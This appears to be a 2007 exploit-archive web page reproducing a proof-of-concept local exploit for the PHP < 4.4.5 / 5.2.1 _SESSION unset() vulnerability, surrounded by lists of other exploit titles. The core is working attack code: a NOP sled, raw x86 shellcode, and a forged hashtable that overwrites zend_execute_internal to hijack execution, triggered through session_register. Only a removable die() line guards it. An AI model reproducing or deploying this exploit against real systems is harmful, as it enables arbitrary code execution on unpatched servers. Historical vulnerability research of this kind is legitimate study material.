exploits , vulnerabilities , articles , PHP < 4.4.5 / 5.2.1

2007-06-15 XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-08 NewsSync for phpBB 1.5.0rc6 Remote File Inclusion Exploit
2007-06-07 Madirish Webmail 2.0 (addressbook.php) Remote File Inclusion Vuln
2007-06-06 Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit
2007-05-24 cpCommerce <= 1.1.0 (category.php id_category) SQL Injection Exploit
2007-05-24 Dokeos <= 1.6.5 (courseLog.php scormcontopen) SQL Injection Exploit

2007-03-26

PHP < 4.4.5 / 5.2.1 _SESSION unset() Local Exploit

Rated as : Critical

<?php
 
////////////////////////////////////////////////////////////////////////
  //  _  _                _                     _       ___  _  _  ___ 
//
  // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \
//
  // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/
//
  // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|  
//
  //                                                                   
//
  //         Proof of concept code from the Hardened-PHP Project       
//
  //                   (C) Copyright 2007 Stefan Esser                 
//
  //                                                                   
//
 
////////////////////////////////////////////////////////////////////////
  //                 PHP _SESSION unset() Vulnerability                
//
 
////////////////////////////////////////////////////////////////////////

  // This is meant as a protection against remote file inclusion.
  die("REMOVE THIS LINE");

  $PHP_MAJOR_VERSION = PHP_VERSION;
  $PHP_MAJOR_VERSION = $PHP_MAJOR_VERSION[0];

  $shellcode = str_repeat("\x90", 256).
     
"\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46".
     
"\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f".
     
"\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6".
     
"\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06".
     
"\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc".
     
"\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d".
      "\x69\x50\x55\x8b\xcf\xd1\x6e\xb6\xcf\xd3\xf1\x65".
     
($PHP_MAJOR_VERSION==4?"\x18\xb0\x53":"\x18\xb0\x83");

  $zend_execute_internal = 0x08345b08;

  $Hashtable = pack("LLLLLLLLLCCC", 2, 1, 0, 0, 0,
$zend_execute_internal, 0, $zend_execute_internal, 0x66666666, 0, 0, 0);

  eval('
  session_start();
  unset($HTTP_SESSION_VARS);
  unset($_SESSION);
  $x = "'.$Hashtable.'";
  session_register($shellcode);');
?>

securitydot.net - 2007-03-26

Exploits - newest 10 RSS | More

2007-06-15 57330 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34248 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42480 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29364 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19794 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16729 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19436 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16618 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33640 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17254 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit

exploits , vulnerabilities , articles , PHP < 4.4.5 / 5.2.1 _SESSION unset() Local Exploit